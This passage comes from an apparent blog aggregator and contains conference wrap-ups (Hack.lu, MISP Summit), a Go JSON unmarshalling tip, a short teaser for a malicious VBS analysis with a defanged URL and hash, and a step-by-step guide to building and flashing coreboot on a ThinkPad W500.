Classic buffer overflow but not exploitable over WiFi. Restarted again… looking for more exploits. The last step was to write the ransomware, why reinvent the wheel? Use the builtin AES functions. The idea was to deliver the ransomware via a fake update. The presentation ended with a recorded demo of a camera being infected:

Ransomwared Camera Demo

Eve Matringe was the next speaker with a talk titled “The regulation 2019/796 concerning restrictive measures against cyber-attacks threatening the Union of its member states” or… Europa is now NSA-Russia cyberbullet proof? This talk was not technical at all and very oriented to regulation (as the title suggested), not easy to understand when you’re not involved with such texts in a day to day basis. But for me it was a good discovery, I was not aware of its existence.

Mattias Deeg & Gerhard Klostermeier presented “New tales of wireless input devices“. Research based on Hack-RF One and CrazyRadio PA. It’s not a new topic, many talks already covered this technology. He started with a quick recapitulations of what has been said about keyboards and mouses researches (starting from 2016!). Interested but nothing brand new, guess what? Such devices provides lot of weaknesses and should definitively not be used in restricted/sensitive environments. Personally, I liked the picture with the 3 pointers bought from Logitech. Once opened, you have three different PCB’s totally different. Was there a rogue one amongst them? The question was asked to Logitech and no information was disclosed.

Solal Jacob presented “Memory forensics analysis of Cisco IOS XR 32 bits routers with Amnesic-Sherpa“. It was a short talk (20 mins) while Solal explained the technique and tools used to perform memory analysis on Cisco routers. Such devices are more and more implied to security incidents. It’s good to know that software exists to deal with them.

Finally, Ange Albertini closed the first day with his famous “Kill MD5 – Demistifying hash collisions“. See my wrap-up from Pass The Salt 2019, Ange presente the same content.

To conclude, a first good day with nice content. I appreciated to large presence of women who presented today! Good to see a better balance in security conferences! Stay tuned tomorrow for the second day!

[The post Hack.lu 2019 Day #1 Wrap-Up has been first published on /dev/random]

If you’ve ever used Go to decode the JSON response returned by a PHP API, you’ll probably have ran into this error:

json: cannot unmarshal array into Go struct field Obj.field of type map[string]string

The problem here being that PHP, rather than returning the empty object you expected ({}), returns an empty array ([]). Not completely unexpected: in PHP there’s no difference between maps/objects and arrays.

Sometimes you can fix the server:

return (object)$mything;

This ensures that an empty $mything becomes {}.

But that’s not always possible, you might have to work around it on the client. With Go, it’s not all that hard.

First, define a custom type for your object:

type MyObj struct {
    ...
    Field map[string]string `json:"field"`
    ...
}

Becomes:

type MyField map[string]string

type MyObj struct {
    ...
    Field MyField `json:"field"`
    ...
}

Then implement the Unmarshaler interface:

func (t *MyField) UnmarshalJSON(in []byte) error {  
    if bytes.Equal(in, []byte("[]")) {
        return nil
    }

    m := (*map[string]string)(t)
    return json.Unmarshal(in, m)
}

And that’s it! JSON deserialization will now gracefully ignore empty arrays returned by PHP.

Some things of note:

  • The method is defined on a pointer receiver (*MyField). This is needed to correctly update the underlying map.
  • I’m casting the t object to map[string]string. This avoids infinite recursion when we later call json.Unmarshal().

Comments | More on rocketeer.be | @rubenv on Twitter

When using strace on a server, you might get this error message when you try to attach to a running process.

October 21, 2019

I’m in Luxembourg for a full week of infosec events. It started today with the MISP summit. It was already the fifth edition and, based on the number of attendees, the tool is getting more and more popularity. The event started with a recap of what happened since the last edition. It was a pretty busy year with many improvements, add-ons. More and more people contribute to the project.

MISP is not only a tool but other parallel projects try to improve the sharing of information. There is a project to become the European sharing standard. Another evidence that the product is really used and alive: Nine CVE’s were disclosed in 2019. On the Github repository, 331 people contributed to the MISP project:

MISP Contributors

I liked the way it was organized: The schedule was based on small talks (20 minutes max) with straight to the point content: improvements, integration or specific use-cases.

The first one was a review of the MISP users’ feelings about the platform. Based on a survey, statistics were generated. Not many people replied to the survey but results look interesting. The conclusions are that MISP is used by skilled people but they consider the tool complex to use. The survey was provided to people who attended a MISP training organized in Luxembourg. It could be a good idea to collect data from more people.

There were two presentations about performance improvements. People dived into the code to find how to optimize the sharing process or to optimize the comparison of IOC’s (mainly malware samples). Other presentations covered ways to improve some features like Sightings.

New releases of MISP introduce new features. The decaying of IOC’s was introduced one month ago and looks very interesting. There was a presentation from the team about this feature but there was also another one from a CERT that implemented its own model to expire IOC’s.

MISP is a nice tool but it must be interconnected to your existing toolbox. One of the presentations covered the integration of MISP with Maltego to build powerful investigation graphs.

Integration with WHIDS (Windows Host IDS). It relies on Sysmon. It correlates events, detects and reacts (dump file, dump process or dump registry). Gene is the detection engine behind WHIDS. It can be seen as a YARA tool for Windows events. MISP support was recently added with some challenges like performance (huge number of IOC’s).

EclecticIQ presented how their platform can be used with MISP. They created a MISP extension to perform enrichment.

TICK – Threat Intelligence Contextualization Knowledgebase by the KPN SRT. The KPN guys explained how they enrich SOC incidents with some context. I liked the use of Certificate Transparency Monitoring. The goal is to use MISP as a central repository to distribute their IOC’s to 3rd parties.

Another presentation that got my attention was about deploying MISP in the cloud. At first, this looks tricky but the way it was implemented is nice. The presentation was based on AWS but any cloud provider could be used. Fully automatic, with load-balancers, self-provisioning. Great project!

Finally, the day ended with some changes that are in the pipe for upcoming MISP releases. Some old code will be dropped, revamping of the web UI, migration to most recent versions of PHP, Python & more!

Thanks to an event like this one, you quickly realize that the MISP project became mature and that many organizations are using it on a daily basis (like I do).

[Update] Talks have been recorded. I presume that they will be online soon with presentations as well. Check the website.

[The post MISP Summit 0x05 Wrap-Up has been first published on /dev/random]

On a freshly installed CentOS 7 machine, I got the following notice when I SSH’d into the server.

October 18, 2019

I published the following diary on isc.sans.edu: “Quick Malicious VBS Analysis“:

Let’s have a look at a VBS sample found yesterday. It started as usual with a phishing email that contained a link to a malicious ZIP archive. This technique is more and more common to deliver the first stage via a URL because it reduces the risk to have the first file blocked by classic security controls. The link was:

hxxp://weddingcardexpress[.]com/ext/modules/payment/moneybookers/logos/docs/8209039094.zip

The downloaded file is saved as JVC_53668.zip (SHA256: 9bf040f912fce08fd5b05dcff9ee31d05ade531eb932c767a5a532cc2643ea61) has a VT score of 1/56… [Read more]

[The post [SANS ISC] Quick Malicious VBS Analysis has been first published on /dev/random]

October 17, 2019

coreboot_logo

I use(d) Libreboot on my Lenovo W500. And it works fine… but I want to install FreeBSD on it. The GRUB payload Libreboot uses by default isn’t compatible with the FreeBSD bootloader. It is possible to boot FreeBSD from GRUB or try to recompile Libreboot with the SeaBIOS payload. …But I just wanted to play with coreboot, to be honest :-)

Prepare

Blobs

To install coreboot you normally extract the required blobs from your current BIOS, for obvious reasons I didn’t want to do this. Libreboot has a utility ich9gen to generated the required blobs - Flash descriptors and GBE (gigabit ethernet) -.

Install Debian 10 (buster )

I used Debian GNU/Linux 10 (buster) to compile coreboot.

Libreboot

We need the ich9gen utility from Libreboot to generated the Blobs in a Free way with the correct MAC address. The MAC address is normally on a label inside your laptop, or you can write it down from the output of the ifconfig command.

Get gpg key

staf@coreboot2:~/libreboot$ gpg --keyserver keys.gnupg.net/ --recv-keys 0x969A979505E8C5B2
gpg: /home/staf/.gnupg/trustdb.gpg: trustdb created
gpg: key 969A979505E8C5B2: public key "Leah Rowe (Libreboot signing key) <info@minifree.org>" imported
gpg: Total number processed: 1
gpg:               imported: 1
staf@coreboot2:~/libreboot$ 

Download

Create the libreboot download directory

staf@coreboot2:~$ mkdir libreboot

Download the checksum files

staf@coreboot2:~/libreboot$ wget https://www.mirrorservice.org/sites/libreboot.org/release/stable/20160907/SHA512SUMS

Verify

staf@coreboot2:~/libreboot$ gpg --verify SHA512SUMS.sig 

Create gbe.bin with the correct mac address

Download the libreboot util

Download

staf@coreboot2:~/libreboot$ wget https://www.mirrorservice.org/sites/libreboot.org/release/stable/20160907/libreboot_r20160907_util.tar.xz

Verify

staf@coreboot2:~/libreboot$ sha512sum libreboot_r20160907_util.tar.xz
c5bfa5a06d55c61e5451e70cd8da3f430b5e06686f9a74c5a2e9fe0e9d155505867b0ca3428d85a983741146c4e024a6b0447638923423000431c98d048bd473  libreboot_r20160907_util.tar.xz
staf@coreboot2:~/libreboot$ 
staf@coreboot2:~/libreboot$ grep c5bfa5a06d55c61e5451e70cd8da3f430b5e06686f9a74c5a2e9fe0e9d155505867b0ca3428d85a983741146c4e024a6b0447638923423000431c98d048bd473 SHA512SUMS

Untar

staf@coreboot2:~/libreboot$ tar xvf libreboot_r20160907_util.tar.xz

find

staf@coreboot2:~/libreboot$ find ./libreboot_r20160907_util | grep -i ich9gen
./libreboot_r20160907_util/ich9deblob/i686/ich9gen
./libreboot_r20160907_util/ich9deblob/armv7l/ich9gen
./libreboot_r20160907_util/ich9deblob/x86_64/ich9gen
staf@coreboot2:~/libreboot$ 

Copy

staf@coreboot2:~/libreboot$ cp ./libreboot_r20160907_util/ich9deblob/i686/ich9gen .

Create

staf@coreboot2:~/libreboot$ ./ich9gen --macaddress XX:XX:XX:XX:XX:XX
You selected to change the MAC address in the Gbe section. This has been done.

The modified gbe region has also been dumped as src files: mkgbe.c, mkgbe.h
To use these in ich9gen, place them in src/ich9gen/ and re-build ich9gen.

descriptor and gbe successfully written to the file: ich9fdgbe_4m.bin
Now do: dd if=ich9fdgbe_4m.bin of=libreboot.rom bs=1 count=12k conv=notrunc
(in other words, add the modified descriptor+gbe to your ROM image)

descriptor and gbe successfully written to the file: ich9fdgbe_8m.bin
Now do: dd if=ich9fdgbe_8m.bin of=libreboot.rom bs=1 count=12k conv=notrunc
(in other words, add the modified descriptor+gbe to your ROM image)

descriptor and gbe successfully written to the file: ich9fdgbe_16m.bin
Now do: dd if=ich9fdgbe_16m.bin of=libreboot.rom bs=1 count=12k conv=notrunc
(in other words, add the modified descriptor+gbe to your ROM image)

descriptor successfully written to the file: ich9fdnogbe_4m.bin
Now do: dd if=ich9fdnogbe_4m.bin of=yourrom.rom bs=1 count=4k conv=notrunc
(in other words, add the modified descriptor to your ROM image)

descriptor successfully written to the file: ich9fdnogbe_8m.bin
Now do: dd if=ich9fdnogbe_8m.bin of=yourrom.rom bs=1 count=4k conv=notrunc
(in other words, add the modified descriptor to your ROM image)

descriptor successfully written to the file: ich9fdnogbe_16m.bin
Now do: dd if=ich9fdnogbe_16m.bin of=yourrom.rom bs=1 count=4k conv=notrunc
(in other words, add the modified descriptor to your ROM image)

staf@coreboot2:~/libreboot$ 

This created the required blobs.

staf@coreboot2:~/libreboot$ ls *.bin
flashregion_0_flashdescriptor.bin  flashregion_3_gbe.bin  ich9fdgbe_4m.bin  ich9fdnogbe_16m.bin  ich9fdnogbe_8m.bin
flashregion_1_bios.bin             ich9fdgbe_16m.bin      ich9fdgbe_8m.bin  ich9fdnogbe_4m.bin
staf@coreboot2:~/libreboot$ 

Compile Coreboot

Install the required packages to compile coreboot

staf@coreboot2:~$ sudo apt-get install -y bison build-essential curl flex git gnat libncurses5-dev m4 zlib1g-dev

git clone

staf@coreboot2:~$ git clone https://review.coreboot.org/coreboot
staf@coreboot2:~/coreboot$ git submodule update --init --checkout

make nconfig

Run make nconfig to get the coreboot configuration menu.

            /home/staf/coreboot/.config - coreboot configuration
 ┌── coreboot configuration ───────────────────────────────────────────────┐
 │                                                                         │
 │                          General setup  --->                            │
 │                          Mainboard  --->                                │
 │                          Chipset  --->                                  │
 │                          Devices  --->                                  │
 │                          Generic Drivers  --->                          │
 │                          Security  --->                                 │
 │                          Console  --->                                  │
 │                          System tables  --->                            │
 │                          Payload  --->                                  │
 │                          Debugging  --->                                │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exi

Mainboard

Select the Mainboard vendor (Lenovo), Mainboard model (ThinkPad W500), ROM chip size (8192 KB (8 MB)).

My W500 has a 8MB Rom chip see https://stafwag.github.io/blog/blog/2019/02/10/how-to-install-libreboot-on-a-thinkspad-w500/.

           /home/staf/coreboot/.config - coreboot configuration
 ┌── Mainboard ────────────────────────────────────────────────────────────┐
 │                                                                         │
 │     *** Important: Run 'make distclean' before switching boards ***     │
 │     Mainboard vendor (Lenovo)  --->                                     │
 │     Mainboard model (ThinkPad W500)  --->                               │
 │     ROM chip size (8192 KB (8 MB))  --->                                │
 │     System Power State after Failure (S5 Soft Off)  --->                │
 │     ()  fmap description file in fmd format                             │
 │     (0x200000) Size of CBFS filesystem in ROM                           │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 │                                                                         │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exi

Chipset

Make sure that the Intel firmware is NOT selected. Normally you’d set it to the path of the extracted firmware, but we’ll use the blobs from Libreboot and dd the Free blobs into coreboot ROM.

                               /home/staf/coreboot/.config - coreboot configuration
 ┌── Chipset ───────────────────────────────────────────────────────────────────────────────────────┐
 │                                                                                                  │
 │              *** SoC ***                                                                         │
 │              *** CPU ***                                                                         │
 │          [*] Enable VMX for virtualization (NEW)                                                 │
 │          [*] Set IA32_FEATURE_CONTROL lock bit (NEW)                                             │
 │              Include CPU microcode in CBFS (Generate from tree)  --->                            │
 │              *** Northbridge ***                                                                 │
 │              *** Southbridge ***                                                                 │
 │          [ ] Validate Intel firmware descriptor (NEW)                                            │
 │              *** Super I/O ***                                                                   │
 │              *** Embedded Controllers ***                                                        │
 │          [*] Beep on fatal error (NEW)                                                           │
 │          [*] Flash LEDs on fatal error (NEW)                                                     │
 │          [ ] Support bluetooth on wifi cards (NEW)                                               │
 │              *** Intel Firmware ***                                                              │
 │          [ ] Add Intel descriptor.bin file (NEW)                                                 │
 │              Protect flash regions (Unlock flash regions)  --->                                  │
 │                                                                                                  │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exit───────────────────────┘

Payload

Make sure the SeeBIOS payload is selected.

                               /home/staf/coreboot/.config - coreboot configuration
 ┌── Payload ───────────────────────────────────────────────────────────────────────────────────────┐
 │                                                                                                  │
 │             Add a payload (SeaBIOS)  --->                                                        │
 │             SeaBIOS version (1.12.1)  --->                                                       │
 │             (5000) PS/2 keyboard controller initialization timeout (milliseconds) (NEW)          │
 │          [ ] Hardware init during option ROM execution (NEW)                                     │
 │          [*] Include generated option rom that implements legacy VGA BIOS compatibility (NEW)    │
 │              ()  SeaBIOS config file (NEW)                                                       │
 │              ()  SeaBIOS bootorder file (NEW)                                                    │
 │          [ ] Add SeaBIOS sercon-port file to CBFS (NEW)                                          │
 │              (-1) SeaBIOS debug level (verbosity) (NEW)                                          │
 │                *** Using default SeaBIOS log level ***                                           │
 │          [ ] Add a PXE ROM (NEW)                                                                 │
 │                 Payload compression algorithm (Use LZMA compression for payloads)  --->          │
 │          [*] Use LZMA compression for secondary payloads (NEW)                                   │
 │              Secondary Payloads  --->                                                            │
 │                                                                                                  │
 │                                                                                                  │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exit───────────────────────┘

Save and exit

Press [ F9 ] to save and exit..

                              /home/staf/coreboot/.config - coreboot configuration
 ┌── coreboot configuration ────────────────────────────────────────────────────────────────────────┐
 │                                                                                                  │
 │                               General setup  --->                                                │
 │                               Mainboard  --->                                                    │
 │                               Chipset  --->                                                      │
 │                               Devices  --->                                                      │
 │                               Generic Drivers  --->                                              │
 │                               Security  --->                                                     │
 │                               Console  --->                                                      │
 │                               System tables  --->                                                │
 │                               Payload  --->                                                      │
 │                  ┌─────────────────────────────────────────────┐                                 │
 │                  │ Do you wish to save your new configuration? │                                 │
 │                  │ <ESC> to cancel and resume nconfig.         │                                 │
 │                  │                                             │                                 │
 │                  │            <save>    <don't save>           │                                 │
 │                  └─────────────────────────────────────────────┘                                 │
 │                                                                                                  │
 │                                                                                                  │
 └F1Help─F2SymInfo─F3Help 2─F4ShowAll─F5Back─F6Save─F7Load─F8SymSearch─F9Exit───────────────────────┘

Compiling

Compile the compiler

The first setup is to compile to compiler to compile coreboot. You can specify the number of core to use with CPUS=.

staf@coreboot2:~/coreboot$ make crossgcc-i386 CPUS=4

compile coreboot

Run make to compile your BIOS.

staf@coreboot2:~/coreboot$ make
Skipping submodule '3rdparty/amd_blobs'
Skipping submodule '3rdparty/blobs'
Skipping submodule '3rdparty/fsp'
Skipping submodule '3rdparty/intel-microcode'
#
# configuration written to /home/staf/coreboot/.config
#
<snip>
Built lenovo/t400 (ThinkPad W500)

        ** WARNING **
coreboot has been built without an Intel Firmware Descriptor.
Never write a complete coreboot.rom without an IFD to your
board's flash chip! You can use flashrom's IFD or layout
parameters to flash only to the BIOS region.

staf@coreboot2:~/coreboot$ 

add the Libreboot desciption and gbe image

add it

Copy the coreboot ROM.

staf@coreboot2:~/coreboot$ cp ./build/coreboot.rom my_w500.rom

and add the Libreboot desciption and gbe image.

staf@coreboot2:~/coreboot$ dd if=~/libreboot/ich9fdgbe_8m.bin of=my_w500.rom bs=12k count=1 conv=notrunc
1+0 records in
1+0 records out
12288 bytes (12 kB, 12 KiB) copied, 0.000726109 s, 16.9 MB/s
staf@coreboot2:~/coreboot$ 

test the image with ifdtool

Coreboot includes an utility ifdtool to extract the blogs from a ROM. We use ifdtool to test our ROM.

Compile and install ifdtool

Goto the ifdtool source directory.

staf@coreboot2:~/coreboot$ cd util/ifdtool/

and run make install this will install ifdtool to the /usr/local/bin/ directory.

staf@coreboot2:~/coreboot/util/ifdtool$ sudo make install
[sudo] password for staf: 
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o ifdtool.o ifdtool.c
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o fmap.o ../cbfstool/flashmap/fmap.c
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o kv_pair.o ../cbfstool/flashmap/kv_pair.c
gcc -O2 -g -Wall -Wextra -Wmissing-prototypes -Werror -I../../src/commonlib/include -I../cbfstool/flashmap -include ../../src/commonlib/include/commonlib/compiler.h -c -o valstr.o ../cbfstool/flashmap/valstr.c
gcc -o ifdtool ifdtool.o fmap.o kv_pair.o valstr.o 
mkdir -p /usr/local/bin
/usr/bin/env install ifdtool /usr/local/bin
staf@coreboot2:~/coreboot/util/ifdtool$ 

test it

staf@coreboot2:~/coreboot$ ifdtool -x my_w500.rom 
File my_w500.rom is 8388608 bytes
  Flash Region 0 (Flash Descriptor): 00000000 - 00000fff 
  Flash Region 1 (BIOS): 00003000 - 007fffff 
  Flash Region 2 (Intel ME): 00fff000 - 00000fff (unused)
  Flash Region 3 (GbE): 00001000 - 00002fff 
  Flash Region 4 (Platform Data): 00fff000 - 00000fff (unused)
staf@coreboot2:~/coreboot$ 

Flash

I had already a custom rom (LibreBoot) on my system, this makes it possible to flash the BIOS without the need to disassemble the laptop to flash it with a clip.

w500 and pi See How to install Libreboot on a ThinkPad W500 if need to flash it from the first time or if you bricked your laptop by flashing a invalid ROM onto it.

Grml

I used Grml to flash coreboot, Grml is nice live GNU/Linux distribution that has flashrom included. You’ll need to boot it with the iomem=relaxed kernel paramter to able to flash the BIOS.

Press [ TAB ] on the boot screen and add iomem=relaxed and press [ ENTER ] to boot.

test

root@grml ~ # flashrom -p internal:laptop=force_I_want_a_brick 
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we
recommend to use the vendor flashing utility. The embedded controller
(EC) in these machines often interacts badly with flashing.
See the manpage and https://flashrom.org/Laptops for details.

If flash is shared with the EC, erase is guaranteed to brick your laptop
and write may brick your laptop.
Read and probe may irritate your EC and cause fan failure, backlight
failure and sudden poweroff.
You have been warned.
========================================================================
Proceeding anyway because user forced us to.
Found chipset "Intel ICH9M-E".
Enabling flash write... OK.
Found Macronix flash chip "MX25L6405" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Found Macronix flash chip "MX25L6405D" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Found Macronix flash chip "MX25L6406E/MX25L6408E" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Found Macronix flash chip "MX25L6436E/MX25L6445E/MX25L6465E/MX25L6473E" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Multiple flash chip definitions match the detected chip(s): "MX25L6405", "MX25L6405D", "MX25L6406E/MX25L6408E", "MX25L6436E/MX25L6445E/MX25L6465E/MX25L6473E"
Please specify which chip definition to use with the -c <chipname> option.
1 root@grml ~ #                                                                                                     :(

read the bios

1 root@grml ~ # flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r w500libreboot.rom               :(
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we
recommend to use the vendor flashing utility. The embedded controller
(EC) in these machines often interacts badly with flashing.
See the manpage and https://flashrom.org/Laptops for details.

If flash is shared with the EC, erase is guaranteed to brick your laptop
and write may brick your laptop.
Read and probe may irritate your EC and cause fan failure, backlight
failure and sudden poweroff.
You have been warned.
========================================================================
Proceeding anyway because user forced us to.
Found chipset "Intel ICH9M-E".
Enabling flash write... OK.
Found Macronix flash chip "MX25L6405D" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Reading flash... done.
flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r   7.38s user 0.01s system 99% cpu 7.392 total

and again

root@grml ~ # flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r w500libreboot2.rom
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we
recommend to use the vendor flashing utility. The embedded controller
(EC) in these machines often interacts badly with flashing.
See the manpage and https://flashrom.org/Laptops for details.

If flash is shared with the EC, erase is guaranteed to brick your laptop
and write may brick your laptop.
Read and probe may irritate your EC and cause fan failure, backlight
failure and sudden poweroff.
You have been warned.
========================================================================
Proceeding anyway because user forced us to.
Found chipset "Intel ICH9M-E".
Enabling flash write... OK.
Found Macronix flash chip "MX25L6405D" (8192 kB, SPI) mapped at physical address 0x00000000ff800000.
Reading flash... done.
flashrom -c "MX25L6405D" -p internal:laptop=force_I_want_a_brick -r   7.37s user 0.02s system 99% cpu 7.393 total
root@grml ~ # 

compare

root@grml ~ # sha1sum w500libreboot*
67438673dd5411bae91ced0e4fdbff06d328ba75  w500libreboot2.rom
67438673dd5411bae91ced0e4fdbff06d328ba75  w500libreboot.rom
root@grml ~ # 

write

139 root@grml ~ # flashrom -c "MX25L6405D" -p internal:boardmismatch=force,laptop=force_I_want_a_brick -w coreboot.rom
flashrom v0.9.9-r1954 on Linux 4.19.0-1-grml-amd64 (x86_64)
flashrom is free software, get the source code at https://flashrom.org

Calibrating delay loop... OK.
coreboot table found at 0x7fad6000.
========================================================================
WARNING! You seem to be running flashrom on an unsupported laptop.
Laptops, notebooks and netbooks are difficult to support and we

** Have fun **

Links

October 16, 2019

I ran into this error when doing a pecl install imagick on a Mac. $ pecl install imagick [.
I was setting up a new Mac and ran into this problem again, where a default PHP installation with brew is missing a few important extensions.